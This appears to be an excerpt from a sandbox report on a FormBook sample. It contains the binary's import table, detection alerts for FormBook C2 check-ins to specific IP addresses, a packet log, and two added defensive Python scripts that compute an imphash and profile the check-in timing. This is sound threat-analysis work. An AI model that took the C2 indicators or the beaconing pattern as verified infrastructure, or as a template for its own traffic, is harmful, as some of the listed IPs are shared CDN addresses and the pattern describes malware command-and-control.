WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
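The import table above is the interpreter's, not the payload's: the mix of WinINet, WSOCK32, MPR, ICMP, clipboard, BlockInput, mciSendStringW and InitiateSystemShutdownExW is what the AutoIt runtime links regardless of which script it carries, which is why the report's Import Hash (afcdf79be1557326c854b6e20cb900a7) is a pivot to other compiled-AutoIt samples rather than to this campaign. The following is an added example, not Joe Sandbox or pefile code; it parses import rows in the report's flattened "DLLname followed by the import list" form, including the wrapped KERNEL32/USER32 rows, and computes the imphash with the pefile rules (lower-case, strip a .dll/.ocx/.sys extension, ordinals become "ordN", entries joined with commas, MD5). It leaves out pefile's ordinal-to-name table for ws2_32/oleaut32, which only matters for binaries importing those by ordinal. REPORT_LINES is a constructed subset of the table above, so its hash is not the report's; the full import directory read from the binary is needed to reproduce that value.

```python
"""Import-hash (imphash) over import-table rows in the form the report prints
them. Added example, not Joe Sandbox or pefile code. Follows the pefile
rules but omits the ws2_32/oleaut32 ordinal-name table. REPORT_LINES is a
constructed subset of the report's import table."""
import hashlib
import re
from typing import List, Tuple, Union

Import = Union[str, int]                      # a function name, or an ordinal number
ImportTable = List[Tuple[str, List[Import]]]

# The report prints "<DLL><first import>, <second import>, ..." with nothing
# between the DLL name and the first import; the extension is the boundary.
DLL_PREFIX_RE = re.compile(r"^([A-Za-z0-9_\-]+\.(?:dll|ocx|sys))(.*)$", re.IGNORECASE)


def parse_report_imports(lines: List[str]) -> ImportTable:
    """Split report rows into (dll, [imports]). A row that does not begin with a
    DLL name is treated as the wrapped continuation of the previous row, which
    is how the KERNEL32 and USER32 rows are broken in the report."""
    table: ImportTable = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        m = DLL_PREFIX_RE.match(line)
        if m:
            table.append((m.group(1), []))
            rest = m.group(2)
        elif table:
            rest = line
        else:
            raise ValueError(f"continuation before any DLL row: {line!r}")
        table[-1][1].extend(name.strip() for name in rest.split(",") if name.strip())
    return table


def normalize_dll(name: str) -> str:
    """Lower-case and strip the extension only when it is .dll, .ocx or .sys."""
    name = name.lower()
    base, _, ext = name.rpartition(".")
    return base if ext in ("dll", "ocx", "sys") else name


def imphash_string(table: ImportTable) -> str:
    """The comma-joined 'dll.func' list that gets hashed; handy for diffing two samples."""
    parts = []
    for dll, imports in table:
        base = normalize_dll(dll)
        for imp in imports:
            func = f"ord{imp}" if isinstance(imp, int) else imp.lower()
            parts.append(f"{base}.{func}")
    return ",".join(parts)


def imphash(table: ImportTable) -> str:
    return hashlib.md5(imphash_string(table).encode("ascii")).hexdigest()


# Constructed subset of the report's import rows, including one wrapped row.
REPORT_LINES = [
    "WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom",
    "VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW",
    "WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW",
    "PSAPI.DLLGetProcessMemoryInfo",
    "IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho",
    "KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, CreateProcessW, ",
    "GetProcessId, SetPriorityClass, IsDebuggerPresent",
]

if __name__ == "__main__":
    table = parse_report_imports(REPORT_LINES)
    for dll, names in table:
        print(f"{dll:14s} {len(names):3d} imports")
    print("imphash of the subset:", imphash(table))
```

Because imphash depends on import order as well as content, two builds of the same interpreter with a reordered import directory hash differently; when pivoting, compare imphash_string output rather than only the digest.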
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-13T13:07:05.530729+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49737 | 172.67.158.234 | 80 | TCP
2024-12-13T13:07:08.252689+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49738 | 172.67.158.234 | 80 | TCP
2024-12-13T13:07:10.908824+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49740 | 172.67.158.234 | 80 | TCP
2024-12-13T13:07:20.468418+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49768 | 161.97.142.144 | 80 | TCP
2024-12-13T13:07:23.138023+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49774 | 161.97.142.144 | 80 | TCP
2024-12-13T13:07:25.936215+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49780 | 161.97.142.144 | 80 | TCP
2024-12-13T13:07:35.326587+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49802 | 209.74.64.58 | 80 | TCP
2024-12-13T13:07:38.014967+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49813 | 209.74.64.58 | 80 | TCP
2024-12-13T13:07:40.722909+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49819 | 209.74.64.58 | 80 | TCP
2024-12-13T13:08:08.290667+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49836 | 45.200.148.45 | 80 | TCP
2024-12-13T13:08:30.307107+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49886 | 45.200.148.45 | 80 | TCP
2024-12-13T13:08:35.450355+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49946 | 104.21.74.79 | 80 | TCP
2024-12-13T13:08:38.122267+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49953 | 104.21.74.79 | 80 | TCP
2024-12-13T13:08:40.780985+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49959 | 104.21.74.79 | 80 | TCP
2024-12-13T13:08:50.698088+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49984 | 3.33.130.190 | 80 | TCP
2024-12-13T13:08:53.357819+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49992 | 3.33.130.190 | 80 | TCP
2024-12-13T13:08:56.049620+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49998 | 3.33.130.190 | 80 | TCP
2024-12-13T13:09:05.300297+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50020 | 13.248.169.48 | 80 | TCP
2024-12-13T13:09:08.375339+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50027 | 13.248.169.48 | 80 | TCP
2024-12-13T13:09:11.032302+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50028 | 13.248.169.48 | 80 | TCP
2024-12-13T13:09:23.555205+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50030 | 144.76.190.39 | 80 | TCP
2024-12-13T13:09:26.191110+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50031 | 144.76.190.39 | 80 | TCP
2024-12-13T13:09:29.106835+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 144.76.190.39 | 80 | TCP
2024-12-13T13:09:46.998712+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50034 | 198.251.84.200 | 80 | TCP
2024-12-13T13:09:49.662523+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50035 | 198.251.84.200 | 80 | TCP
2024-12-13T13:09:52.307580+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50036 | 198.251.84.200 | 80 | TCP
2024-12-13T13:10:02.206907+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50038 | 217.160.0.60 | 80 | TCP
2024-12-13T13:10:04.777592+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50039 | 217.160.0.60 | 80 | TCP
2024-12-13T13:10:07.610447+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50040 | 217.160.0.60 | 80 | TCP
2024-12-13T13:10:17.022533+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50042 | 161.97.142.144 | 80 | TCP
2024-12-13T13:10:19.888644+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50043 | 161.97.142.144 | 80 | TCP
2024-12-13T13:10:23.366724+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50044 | 161.97.142.144 | 80 | TCP
2024-12-13T13:10:33.107170+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50046 | 172.67.149.64 | 80 | TCP
2024-12-13T13:10:35.778951+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50047 | 172.67.149.64 | 80 | TCP
2024-12-13T13:10:38.435162+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50048 | 172.67.149.64 | 80 | TCP
2024-12-13T13:10:48.113015+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50050 | 3.33.130.190 | 80 | TCP
                                                                        2024-12-13T13:10:50.763553+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500513.33.130.19080TCP
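The alert rows above show the FormBook check-in cadence: three POSTs to one host about three seconds apart, then ten seconds or more of silence before the next host, and 3.33.130.190 visited again at the end. The Python script below is an added example, not code from Joe Sandbox or from the ETPRO ruleset. It takes the alert rows (copied into the script in '|'-separated form), splits them into per-host runs, measures the spacing within and between runs, and extracts the destination list. The thresholds it checks (three hits per host, at most five seconds apart) are assumptions read off these rows, not documented FormBook constants. One caveat for anyone turning the list into blocks: FormBook configurations pad the real C2 with decoy hosts, and several destinations here sit in shared CDN ranges (172.67.x and 104.21.x are Cloudflare), so treat the list as indicators of this sample's configuration rather than as confirmed live C2.

```python
"""Profile FormBook C2 check-in alerts exported from a Joe Sandbox report.

Added example, not code from Joe Sandbox or the ETPRO ruleset. ALERT_ROWS is
constructed from the alert table above, one '|'-separated field per column in
Joe Sandbox's order (timestamp, SID, signature, severity, src IP, src port,
dst IP, dst port, protocol). The shape checked below (3 POSTs per host a few
seconds apart, then the next host) is an assumption read off these rows.
"""
from datetime import datetime

ALERT_ROWS = """\
2024-12-13T13:08:50.698088+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49984|3.33.130.190|80|TCP
2024-12-13T13:08:53.357819+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49992|3.33.130.190|80|TCP
2024-12-13T13:08:56.049620+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|49998|3.33.130.190|80|TCP
2024-12-13T13:09:05.300297+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50020|13.248.169.48|80|TCP
2024-12-13T13:09:08.375339+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50027|13.248.169.48|80|TCP
2024-12-13T13:09:11.032302+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50028|13.248.169.48|80|TCP
2024-12-13T13:09:23.555205+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50030|144.76.190.39|80|TCP
2024-12-13T13:09:26.191110+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50031|144.76.190.39|80|TCP
2024-12-13T13:09:29.106835+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50032|144.76.190.39|80|TCP
2024-12-13T13:09:46.998712+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50034|198.251.84.200|80|TCP
2024-12-13T13:09:49.662523+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50035|198.251.84.200|80|TCP
2024-12-13T13:09:52.307580+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50036|198.251.84.200|80|TCP
2024-12-13T13:10:02.206907+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50038|217.160.0.60|80|TCP
2024-12-13T13:10:04.777592+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50039|217.160.0.60|80|TCP
2024-12-13T13:10:07.610447+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50040|217.160.0.60|80|TCP
2024-12-13T13:10:17.022533+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50042|161.97.142.144|80|TCP
2024-12-13T13:10:19.888644+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50043|161.97.142.144|80|TCP
2024-12-13T13:10:23.366724+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50044|161.97.142.144|80|TCP
2024-12-13T13:10:33.107170+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50046|172.67.149.64|80|TCP
2024-12-13T13:10:35.778951+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50047|172.67.149.64|80|TCP
2024-12-13T13:10:38.435162+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50048|172.67.149.64|80|TCP
2024-12-13T13:10:48.113015+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50050|3.33.130.190|80|TCP
2024-12-13T13:10:50.763553+0100|2855464|ETPRO MALWARE FormBook CnC Checkin (POST) M3|1|192.168.2.4|50051|3.33.130.190|80|TCP
"""
FIELDS = ("ts", "sid", "sig", "sev", "src", "sport", "dst", "dport", "proto")


def parse_alerts(text):
    """Turn '|'-separated rows into dicts with aware datetimes and int ports."""
    alerts = []
    for line in filter(str.strip, text.splitlines()):
        rec = dict(zip(FIELDS, (f.strip() for f in line.split("|"))))
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%S.%f%z")  # %z takes +0100
        rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
        alerts.append(rec)
    return alerts


def checkin_runs(alerts):
    """Split the time-ordered stream into runs of consecutive hits on one host.

    Grouping by run, not by IP, keeps a revisited host (3.33.130.190 at the
    start and again at the end) as two runs, so per-run spacing stays honest.
    """
    runs = []
    for a in sorted(alerts, key=lambda r: r["ts"]):
        if runs and runs[-1][-1]["dst"] == a["dst"]:
            runs[-1].append(a)
        else:
            runs.append([a])
    return runs


def run_profile(run):
    """Host, hit count and mean spacing in seconds of one run (None for a single hit)."""
    gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(run, run[1:])]
    return {"dst": run[0]["dst"], "dport": run[0]["dport"], "count": len(run),
            "first": run[0]["ts"], "last": run[-1]["ts"],
            "mean_gap": sum(gaps) / len(gaps) if gaps else None}


def rotation_gaps(runs):
    """Seconds between the last hit on one host and the first hit on the next."""
    return [(n[0]["ts"] - c[-1]["ts"]).total_seconds() for c, n in zip(runs, runs[1:])]


def looks_like_formbook_rotation(runs, per_host=3, max_gap=5.0):
    """True when every complete run has per_host hits spaced at most max_gap apart.

    The final run may be cut off by the end of the capture, so it only has to be
    no longer than per_host. Both thresholds are assumptions, not FormBook facts.
    """
    if not runs:
        return False
    for p in map(run_profile, runs[:-1]):
        if p["count"] != per_host or (p["mean_gap"] or 0.0) > max_gap:
            return False
    return run_profile(runs[-1])["count"] <= per_host


def destinations(alerts):
    """Unique (dst IP, dst port) pairs in first-seen order, for blocking or hunting."""
    seen = []
    for pair in ((a["dst"], a["dport"]) for a in alerts):
        if pair not in seen:
            seen.append(pair)
    return seen


if __name__ == "__main__":
    runs = checkin_runs(parse_alerts(ALERT_ROWS))
    for p in map(run_profile, runs):
        print(f"{p['dst']:>15}:{p['dport']}  hits={p['count']}  mean gap={p['mean_gap']}")
    print("host-to-host gaps (s):", [round(g, 1) for g in rotation_gaps(runs)])
    print("FormBook-like rotation:", looks_like_formbook_rotation(runs))
```

Run it directly to print one line per run, the host-to-host gaps and the verdict. To cover the whole capture, paste the full alert table into ALERT_ROWS in the same '|' form; runs are built from consecutive alerts, so the check only needs the rows to be in time order, which the script enforces by sorting.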
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 13:06:47.225857973 CET | 49736 | 80 | 192.168.2.4 | 15.204.67.7
Dec 13, 2024 13:06:47.345817089 CET | 80 | 49736 | 15.204.67.7 | 192.168.2.4
Dec 13, 2024 13:06:47.345933914 CET | 49736 | 80 | 192.168.2.4 | 15.204.67.7
Dec 13, 2024 13:06:47.357765913 CET | 49736 | 80 | 192.168.2.4 | 15.204.67.7
Dec 13, 2024 13:06:47.477677107 CET | 80 | 49736 | 15.204.67.7 | 192.168.2.4
Dec 13, 2024 13:06:48.766279936 CET | 80 | 49736 | 15.204.67.7 | 192.168.2.4
Dec 13, 2024 13:06:48.766361952 CET | 80 | 49736 | 15.204.67.7 | 192.168.2.4
Dec 13, 2024 13:06:48.766458988 CET | 80 | 49736 | 15.204.67.7 | 192.168.2.4
Dec 13, 2024 13:06:48.766601086 CET | 49736 | 80 | 192.168.2.4 | 15.204.67.7
Dec 13, 2024 13:06:48.770984888 CET | 49736 | 80 | 192.168.2.4 | 15.204.67.7
Dec 13, 2024 13:06:48.890698910 CET | 80 | 49736 | 15.204.67.7 | 192.168.2.4
Dec 13, 2024 13:07:04.229716063 CET | 49737 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:04.349515915 CET | 80 | 49737 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:04.349600077 CET | 49737 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:04.360903025 CET | 49737 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:04.480706930 CET | 80 | 49737 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:05.529803991 CET | 80 | 49737 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:05.529853106 CET | 80 | 49737 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:05.530729055 CET | 49737 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:05.531405926 CET | 80 | 49737 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:05.535249949 CET | 49737 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:05.872021914 CET | 49737 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:06.895175934 CET | 49738 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:07.014908075 CET | 80 | 49738 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:07.015014887 CET | 49738 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:07.034020901 CET | 49738 | 80 | 192.168.2.4 | 172.67.158.234
Dec 13, 2024 13:07:07.153842926 CET | 80 | 49738 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:08.252403975 CET | 80 | 49738 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:08.252502918 CET | 80 | 49738 | 172.67.158.234 | 192.168.2.4
Dec 13, 2024 13:07:08.252548933 CET | 80 | 49738 | 172.67.158.234 | 192.168.2.4
